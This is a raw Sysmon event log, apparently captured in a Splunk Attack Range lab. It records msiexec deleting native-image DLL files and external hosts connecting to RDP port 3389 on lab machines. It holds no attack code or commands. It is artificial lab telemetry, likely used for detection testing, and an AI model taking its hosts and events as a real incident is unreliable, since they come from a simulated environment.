AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\QGHMUB8IBD\System.ni.dllMD5=78947C49BA92424CC6AA6E8CD6D1CB3A,SHA256=4123DF564E230E74A1AB0AB44271D9B033898AE5F9BD741BB3C914D6F1D539C7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000050034Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:33.344{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=727201DBC2F3E497244C9725CA6CE1AF,SHA256=808F0EC50FF1B9D5812FE0608C1CB1FCF4FCA8CE614CD34349BD340065546002,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050033Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:33.312{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE2E987464EAB2AB443DA164EB99B004,SHA256=8FD23AA4545F00AAC7314F70B1B653F4F963D0932C917C6B070DE181D3C03583,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.984{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\T35SMSC9NL\System.Core.ni.dll.auxMD5=F17814BA3A499E75D25D8600316A312E,SHA256=83B003AF767D928434650744A536BB23C6BEB46D3D16DD964DBE77382A1EADC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.984{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\T35SMSC9NL\System.Core.ni.dllMD5=BABB1248300114458CE418D687F12C45,SHA256=2C4CF0E399747B3A28FAF4BED3A5DB80E1B32E39A1F6AD1A24DCEB2F4BDBD731,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.828{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\SUK77Z1XOM\System.Drawing.ni.dll.auxMD5=DCEFC8B9CB7245B90F2A6AA4084A0F71,SHA256=3760AFB996B9C1860A13167C3DA5FD6B019EE185076145A71387745DC8DA24A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.828{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\SUK77Z1XOM\System.Drawing.ni.dllMD5=E8956B039DFD94E1EDBD129DE56F3F2D,SHA256=1DAC647C4642EB0A13A5135BCAF254A30E477CD5DF6BD7DF978F2065CAF5BFE2,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.797{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\SU6BGTV8II\System.Management.ni.dll.auxMD5=FE20915E753A6B48C1D7C978C1AFF282,SHA256=D66CA48589CA1B1CCCDFDE70ECB6B57B258A0962DA308809DD46E0F4ABEC0D4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.797{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\SU6BGTV8II\System.Management.ni.dllMD5=A2398F5CDEEC4226380CB620C5D180D8,SHA256=4007C9B8A5360D49CD4DA98D262DA539AD790AA13CA54712757441B1C56F2980,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.781{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\SQ7M0TZAP9\System.Management.ni.dll.auxMD5=A1123A272EA45D0BE152C0EEBD6784E2,SHA256=5B0E627B5F7CFC5A685543302698C7882E396403C78E13DE7A7443221A86F536,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.781{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\SQ7M0TZAP9\System.Management.ni.dllMD5=1EE419429DFC6FD092EA7828ED535BFB,SHA256=66C905BB59A36F4F0D862B6C9C7125C212BCD31DC12821EEB4B7B72994CAA787,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.750{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\SNLOKA1ZYO\System.Core.ni.dll.auxMD5=68F3E83339872D673C61BCDADE513017,SHA256=25ECE5E7917FE392F280C93C69EA441333898E738D28AE8C2F578E364ED7DA77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.750{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\SNLOKA1ZYO\System.Core.ni.dllMD5=E993EA2898B9C9812D58FFE1AE84E74B,SHA256=28BB8495AE0284A1262A0A7F02F222498059917F05A973937589A60F9C8A23E2,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000073113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:33.143{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-35594-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:33.068{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57521-false10.0.1.12-8000- 354300x800000000000000073111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:33.039{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-38322-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.687{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA9DB1B0BA62F086B4390D5AECF546C0,SHA256=1CB3F3D4126B50250DE7E7EAA130E53BD419EFA69D1D1359327F12211EDD28A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.594{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=2D7E11347D8270C2EB13548C2201E08B,SHA256=094CDF22EAE67C4A156602D1E1B8FBEFBD1114FA6DBAED964E2507AE4625D1BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.578{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\SG3QQYR109\System.Core.ni.dll.auxMD5=9C2C1DF16379BF958B0D67E0B3610AE4,SHA256=AFBE99A8170E89F98A87750E88CC02E6E9B7B6E188CA47043EB1B64C68FA0B0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.578{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\SG3QQYR109\System.Core.ni.dllMD5=E0408356E6103FCD924AC2285DC1C885,SHA256=0D45CD52A92CB9B17E8931E21B3183C8605255624264C10BF9B5AB5FF14D8D0D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.500{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36B66C7A9937959412CA575CD2B620A1,SHA256=F76FB34E3BB510C2828C1AC96AEA02D6263BA85CE71DD67A703AC95DD9E98C4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.453{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\SE93RZEWOY\System.ni.dll.auxMD5=02AA118D8E3C67485AE986D7809E5813,SHA256=B90C0DD717587FAB26AE04FAA85FAB8119FF23CDD5596A954BC5E660BB3EB1CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.453{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\SE93RZEWOY\System.ni.dllMD5=6D7E9BF18E21AD794AF893EBB009E6A7,SHA256=837C8E670276112124615988CF0B655B6202FD2F351A34F56A7159AF12C4855A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.266{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\S28N7JUG56\System.ServiceModel.Channels.ni.dll.auxMD5=24C96490414503BD6F9A89910E524FE6,SHA256=90368670D86C6D23108DEFB97877396DB68D63E4C13B11C6F482519FD387661B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.266{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\S28N7JUG56\System.ServiceModel.Channels.ni.dllMD5=0B906FCE3A311AB81C8EBEA00FD629F0,SHA256=E7F372A1C2CF8BDA12DBD0860F3562D207689D5C6BECCE0015EF5CA97E7649E5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.250{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\RWWS0XEEX8\System.Management.ni.dll.auxMD5=3C0E46C45BCF91E9607FCCE8F2EB1153,SHA256=8B62160D2B2016E7615E19AF407C52A66A6AB89F6AA48255F39D85AD826A6391,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.250{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\RWWS0XEEX8\System.Management.ni.dllMD5=ED030D562E600AD124F818C0F59AE89D,SHA256=5080BE95FA9CA821324B2094792AE5A473F1CFBC38E20209EFDC3E775D054CE4,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.203{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\RTNTAJ5QYG\System.Xml.Linq.ni.dll.auxMD5=CCF15A1A5478AD4C9A6C5EAC3B4EDB1D,SHA256=80C7E515F2F30459C447E0C663804F04B2325BC9F6246CC881B933FFF502A2BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.203{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\RTNTAJ5QYG\System.Xml.Linq.ni.dllMD5=01675F7E454CEA910CBAEB0A7D4BF59F,SHA256=0F6DF0E70167F51DABB0B82E921D337094D2833E91B72BF4BE15756F8E49DA88,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.203{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\RLJ402KVPV\Microsoft.CSharp.ni.dll.auxMD5=4F6E2CF657AB3C20B463DF7873DF8594,SHA256=F609CD67B4E59BCAEA6C8472B314A28DCF1872AA6EE9113BF399F45726EB4F5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.187{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\RLJ402KVPV\Microsoft.CSharp.ni.dllMD5=5F895695883F631A993A0F8F582807B3,SHA256=1C785DA125A9DF9516988A97E44348DB77186BA39EFF3C7F82E5391505B61CC8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.141{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\RK5K12ZZVI\System.Data.ni.dll.auxMD5=AD2C4453E59EB7892FA2CC4ABD0A7E7C,SHA256=DE2C69FD102FE3E1072F2FA0F3FB9625D65E9059393B2664F5D464A7E3FEA7BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.141{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\RK5K12ZZVI\System.Data.ni.dllMD5=504A4880B14625199F3F1AEFCCE6B202,SHA256=3F6D6E89B2EBE19C15EDBC2E78B8BE32178FDB37A8C1DB5A46DB8A76701910EF,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000050038Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:33.273{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com56374-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050037Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:32.255{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58348-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050036Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:34.750{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4DE234472EE96A5BD1060C2BEE7B0546,SHA256=EF896C7D4BFBE1C035D9608D4124D0A817823A0B1A971A44922F560F14AD8D68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050035Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:34.344{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09D28A669C2334EE28BE1C46AC1C2616,SHA256=7E6A526650B93F8848341AC041F0791A796E1A6172633579F31F2EF304E51A40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:35.906{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\U97084HOD2\CustomMarshalers.ni.dll.auxMD5=1B8DC30D3E1603C9DFC6045DE267AF71,SHA256=9760764A3E526F12D9481D6A6D9590E737DDEDFAB481D8ECB2296CB32C0DF0AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:35.906{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\U97084HOD2\CustomMarshalers.ni.dllMD5=53F371A0174862A68DC878FBC0D61266,SHA256=9FB938EC3F9D66E64AD525DE4F30CF27153A929044D64DBB8874CE5B01F8697F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:35.828{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\U0PIT4VXCM\System.IO.Compression.ni.dll.auxMD5=41EEBA98CCE6653861F4C0A7CE5DABB0,SHA256=30029B1A6AB901F5296117A11EF64E86D2CD12CDE5513326A8322C7389B31923,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:35.828{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\U0PIT4VXCM\System.IO.Compression.ni.dllMD5=222717FF5E045032C8546855A709602C,SHA256=A51C561900046AC9B7FA831C5499459E234999D2E48F326ECC85A94FC5E5C193,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:35.828{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\U0MLKMHPO2\System.Web.ni.dll.auxMD5=3BF11075FF377DABD00295A10B159897,SHA256=06CD7958ED343C21E2B632F48856453AB2FDB59C7C3B82D30FC94BE485E62884,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:35.812{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\U0MLKMHPO2\System.Web.ni.dllMD5=A0A7A24BBB1337F0F402CA464D0270CF,SHA256=7A6208DE8BAF9327E0195E456E67B16729EACB4BF7CB6D9CD1C9A79F58B1F2FC,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000073135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.598{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-39685-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:34.129{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com57186-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:35.640{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=EF3E659EE9372BDAD62A00A911C1D381,SHA256=774103E2BB48307A95B1920C928417A5A556971F463F120D7395E2D69EE0D55D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:35.515{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1E1A14767E80F5136588CDF260AA43B,SHA256=485DF09B8593A7E70DB3661A1F7A7EFF47683A153D6CCE1C91DC8D08D4B4F42E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:35.437{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\TREBLZ8848\System.Transactions.ni.dll.auxMD5=345B032FDAB64413D929BFBDE26FDCD7,SHA256=2071BD12C470F01C83E6EFFBADF7E960568551E140259A99309F9CFF8BE70FAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:35.437{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\TREBLZ8848\System.Transactions.ni.dllMD5=CD8B06DACE1AE70F053FB67F75439D1A,SHA256=0D78871A1A1AFA2B8AE0A97E0D781565C2014C1A4C687D3731557233DD0684C3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:35.406{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\TKH0RXDAYQ\System.Drawing.ni.dll.auxMD5=6C52FA11480271A7CA24597B93F7BB04,SHA256=61F5983290D91AB3DF009F8C874FA8FE2746C9AB30195650831EE3035CB71CCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:35.406{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\TKH0RXDAYQ\System.Drawing.ni.dllMD5=C0CD3B953E9ADDA2C2CA1B521CAC444A,SHA256=792530B90A2559951E4A2DBECBE5B4B3FDC08CB4140A89FC252E49C9FD342359,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:35.344{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\T7DUA2RN2I\System.ni.dll.auxMD5=97D37AFB390992CE3C6F1D4E1112CAA5,SHA256=E9BE5584192A17CDF882242AB2C104E2A185B276E589F81AEC50663E4BA6F881,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:35.344{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\T7DUA2RN2I\System.ni.dllMD5=709A692740777021A1BC08A50B61C807,SHA256=AD85D06B3912A64986318D87202BDCAD748D6E68E3B693D37459EF9874889CCF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:35.062{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\T4H37VL5ZT\System.Core.ni.dll.auxMD5=870A3297397BA0FE7218B9C05CCD1E5E,SHA256=1EB4BF3E6FB4775A6F7AEE5392F452B0E673B4F5C6E539E2C40414946C7BDEFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:35.062{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\T4H37VL5ZT\System.Core.ni.dllMD5=8326A23004BDB577F7A7127273214004,SHA256=F00785989931F0C8E944A6A8DD2D28F4F623EF4B9CDCBFDA3C1ADE17FDF1D9F8,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000050041Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:33.827{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59824-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050040Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:33.670{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52513-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000050039Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:35.375{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D68567710C74599E4B3FB49C68D7DCD,SHA256=4467649762E58FE4C9F66EF8B6B9543622C706DEB3CE895486C6B3C8086CD7A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:36.875{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\W50MXUJNJZ\System.Numerics.ni.dll.auxMD5=46C8A979AD3266DDEF725C7E593B0EC9,SHA256=44F41AE20DFD28ABE6EE0E04898C519AD9709FA50D948409B2ECD81BB20D3D37,IMPHASH=00000000000000000000000000000000falsetrue 